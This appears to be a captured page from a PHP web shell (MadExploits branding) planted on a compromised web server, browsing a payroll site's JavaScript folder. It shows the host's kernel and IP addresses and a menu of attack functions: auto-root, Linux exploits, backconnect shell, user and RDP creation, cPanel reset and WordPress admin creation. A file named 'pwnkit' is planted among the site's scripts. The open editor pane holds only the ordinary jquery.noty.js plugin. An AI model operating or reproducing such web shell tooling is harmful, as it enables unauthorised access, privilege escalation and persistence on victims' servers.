Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.224.153.49
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap-alert.js
2.34
KB
-rw-r--r--
bootstrap-button.js
2.65
KB
-rw-r--r--
bootstrap-carousel.js
4.9
KB
-rw-r--r--
bootstrap-collapse.js
4.29
KB
-rw-r--r--
bootstrap-dropdown.js
2.66
KB
-rw-r--r--
bootstrap-modal.js
5.54
KB
-rw-r--r--
bootstrap-popover.js
2.81
KB
-rw-r--r--
bootstrap-scrollspy.js
4.27
KB
-rw-r--r--
bootstrap-tab.js
3.3
KB
-rw-r--r--
bootstrap-toggle.js
2.76
KB
-rw-r--r--
bootstrap-tooltip.js
7.49
KB
-rw-r--r--
bootstrap-tour.js
6.67
KB
-rw-r--r--
bootstrap-transition.js
1.76
KB
-rw-r--r--
bootstrap-typeahead.js
6.91
KB
-rw-r--r--
charisma.js
18.68
KB
-rw-r--r--
excanvas.js
40.8
KB
-rw-r--r--
fullcalendar.min.js
48.83
KB
-rw-r--r--
jquery-1.11.0.min.js
94.12
KB
-rw-r--r--
jquery-1.7.2.min.js
92.62
KB
-rw-r--r--
jquery-ui-1.8.21.custom.min.js
202.07
KB
-rw-r--r--
jquery.autogrow-textarea.js
2.09
KB
-rw-r--r--
jquery.avgrund.js
3.24
KB
-rw-r--r--
jquery.chosen.min.js
22.4
KB
-rw-r--r--
jquery.cleditor.min.js
11.76
KB
-rw-r--r--
jquery.colorbox.min.js
9.46
KB
-rw-r--r--
jquery.cookie.js
1.9
KB
-rw-r--r--
jquery.dataTables.min.js
69.08
KB
-rw-r--r--
jquery.elfinder.min.js
130.93
KB
-rw-r--r--
jquery.flot.min.js
36.67
KB
-rw-r--r--
jquery.flot.pie.min.js
8.65
KB
-rw-r--r--
jquery.flot.resize.min.js
1.21
KB
-rw-r--r--
jquery.flot.stack.js
6.8
KB
-rw-r--r--
jquery.history.js
21.07
KB
-rw-r--r--
jquery.iphone.toggle.js
9.69
KB
-rw-r--r--
jquery.js
242.01
KB
-rw-r--r--
jquery.leanModal.min.js
1
KB
-rw-r--r--
jquery.min.js
91.25
KB
-rw-r--r--
jquery.noty.js
8.19
KB
-rw-r--r--
jquery.raty.min.js
7.37
KB
-rw-r--r--
jquery.uniform.min.js
9.1
KB
-rw-r--r--
jquery.uploadify-3.1.min.js
45.18
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.noty.js
/** * noty - jQuery Notification Plugin v1.2.1 * Contributors: https://github.com/needim/noty/graphs/contributors * * Examples and Documentation - http://needim.github.com/noty/ * * Licensed under the MIT licenses: * http://www.opensource.org/licenses/mit-license.php * **/ (function($) { $.noty = function(options, customContainer) { var base = {}; var $noty = null; var isCustom = false; base.init = function(options) { base.options = $.extend({}, $.noty.defaultOptions, options); base.options.type = base.options.cssPrefix+base.options.type; base.options.id = base.options.type+'_'+new Date().getTime(); base.options.layout = base.options.cssPrefix+'layout_'+base.options.layout; if (base.options.custom.container) customContainer = base.options.custom.container; isCustom = ($.type(customContainer) === 'object') ? true : false; return base.addQueue(); }; // Push notification to queue base.addQueue = function() { var isGrowl = ($.inArray(base.options.layout, $.noty.growls) == -1) ? false : true; if (!isGrowl) (base.options.force) ? $.noty.queue.unshift({options: base.options}) : $.noty.queue.push({options: base.options}); return base.render(isGrowl); }; // Render the noty base.render = function(isGrowl) { // Layout spesific container settings var container = (isCustom) ? customContainer.addClass(base.options.theme+' '+base.options.layout+' noty_custom_container') : $('body'); if (isGrowl) { if ($('ul.noty_cont.' + base.options.layout).length == 0) container.prepend($('<ul/>').addClass('noty_cont ' + base.options.layout)); container = $('ul.noty_cont.' + base.options.layout); } else { if ($.noty.available) { var fromQueue = $.noty.queue.shift(); // Get noty from queue if ($.type(fromQueue) === 'object') { $.noty.available = false; base.options = fromQueue.options; } else { $.noty.available = true; // Queue is over return base.options.id; } } else { return base.options.id; } } base.container = container; // Generating noty bar base.bar = $('<div class="noty_bar"/>').attr('id', base.options.id).addClass(base.options.theme+' '+base.options.layout+' '+base.options.type); $noty = base.bar; $noty.append(base.options.template).find('.noty_text').html(base.options.text); $noty.data('noty_options', base.options); // Close button display (base.options.closeButton) ? $noty.addClass('noty_closable').find('.noty_close').show() : $noty.find('.noty_close').remove(); // Bind close event to button $noty.find('.noty_close').bind('click', function() { $noty.trigger('noty.close'); }); // If we have a button we must disable closeOnSelfClick and closeOnSelfOver option if (base.options.buttons) base.options.closeOnSelfClick = base.options.closeOnSelfOver = false; // Close on self click if (base.options.closeOnSelfClick) $noty.bind('click', function() { $noty.trigger('noty.close'); }).css('cursor', 'pointer'); // Close on self mouseover if (base.options.closeOnSelfOver) $noty.bind('mouseover', function() { $noty.trigger('noty.close'); }).css('cursor', 'pointer'); // Set buttons if available if (base.options.buttons) { $buttons = $('<div/>').addClass('noty_buttons'); $noty.find('.noty_message').append($buttons); $.each(base.options.buttons, function(i, button) { bclass = (button.type) ? button.type : 'gray'; $button = $('<button/>').addClass(bclass).html(button.text).appendTo($noty.find('.noty_buttons')) .bind('click', function() { if ($.isFunction(button.click)) { button.click.call($button, $noty); } }); }); } return base.show(isGrowl); }; base.show = function(isGrowl) { // is Modal? if (base.options.modal) $('<div/>').addClass('noty_modal').addClass(base.options.theme).prependTo($('body')).fadeIn('fast'); $noty.close = function() { return this.trigger('noty.close'); }; // Prepend noty to container (isGrowl) ? base.container.prepend($('<li/>').append($noty)) : base.container.prepend($noty); // topCenter and center specific options if (base.options.layout == 'noty_layout_topCenter' || base.options.layout == 'noty_layout_center') { $.noty.reCenter($noty); } $noty.bind('noty.setText', function(event, text) { $noty.find('.noty_text').html(text); if (base.options.layout == 'noty_layout_topCenter' || base.options.layout == 'noty_layout_center') { $.noty.reCenter($noty); } }); $noty.bind('noty.setType', function(event, type) { $noty.removeClass($noty.data('noty_options').type); type = $noty.data('noty_options').cssPrefix+type; $noty.data('noty_options').type = type; $noty.addClass(type); if (base.options.layout == 'noty_layout_topCenter' || base.options.layout == 'noty_layout_center') { $.noty.reCenter($noty); } }); $noty.bind('noty.getId', function(event) { return $noty.data('noty_options').id; }); // Bind close event $noty.one('noty.close', function(event) { var options = $noty.data('noty_options'); if(options.onClose){options.onClose();} // Modal Cleaning if (options.modal) $('.noty_modal').fadeOut('fast', function() { $(this).remove(); }); $noty.clearQueue().stop().animate( $noty.data('noty_options').animateClose, $noty.data('noty_options').speed, $noty.data('noty_options').easing, $noty.data('noty_options').onClosed) .promise().done(function() { // Layout spesific cleaning if ($.inArray($noty.data('noty_options').layout, $.noty.growls) > -1) { $noty.parent().remove(); } else { $noty.remove(); // queue render $.noty.available = true; base.render(false); } }); }); // Start the show if(base.options.onShow){base.options.onShow();} $noty.animate(base.options.animateOpen, base.options.speed, base.options.easing, base.options.onShown); // If noty is have a timeout option if (base.options.timeout) $noty.delay(base.options.timeout).promise().done(function() { $noty.trigger('noty.close'); }); return base.options.id; }; // Run initializer return base.init(options); }; // API $.noty.get = function(id) { return $('#'+id); }; $.noty.close = function(id) { //remove from queue if not already visible for(var i=0;i<$.noty.queue.length;) { if($.noty.queue[i].options.id==id) $.noty.queue.splice(id,1); else i++; } //close if already visible $.noty.get(id).trigger('noty.close'); }; $.noty.setText = function(id, text) { $.noty.get(id).trigger('noty.setText', text); }; $.noty.setType = function(id, type) { $.noty.get(id).trigger('noty.setType', type); }; $.noty.closeAll = function() { $.noty.clearQueue(); $('.noty_bar').trigger('noty.close'); }; $.noty.reCenter = function(noty) { noty.css({'left': ($(window).width() - noty.outerWidth()) / 2 + 'px'}); }; $.noty.clearQueue = function() { $.noty.queue = []; }; var windowAlert = window.alert; $.noty.consumeAlert = function(options){ window.alert = function(text){ if(options){options.text = text;} else{options = {text:text};} $.noty(options); }; } $.noty.stopConsumeAlert = function(){ window.alert = windowAlert; } $.noty.queue = []; $.noty.growls = ['noty_layout_topLeft', 'noty_layout_topRight', 'noty_layout_bottomLeft', 'noty_layout_bottomRight']; $.noty.available = true; $.noty.defaultOptions = { layout: 'top', theme: 'noty_theme_default', animateOpen: {height: 'toggle'}, animateClose: {height: 'toggle'}, easing: 'swing', text: '', type: 'alert', speed: 500, timeout: 5000, closeButton: false, closeOnSelfClick: true, closeOnSelfOver: false, force: false, onShow: false, onShown: false, onClose: false, onClosed: false, buttons: false, modal: false, template: '<div class="noty_message"><span class="noty_text"></span><div class="noty_close"></div></div>', cssPrefix: 'noty_', custom: { container: null } }; $.fn.noty = function(options) { return this.each(function() { (new $.noty(options, $(this))); }); }; })(jQuery); //Helper function noty(options) { return jQuery.noty(options); // returns an id }
Close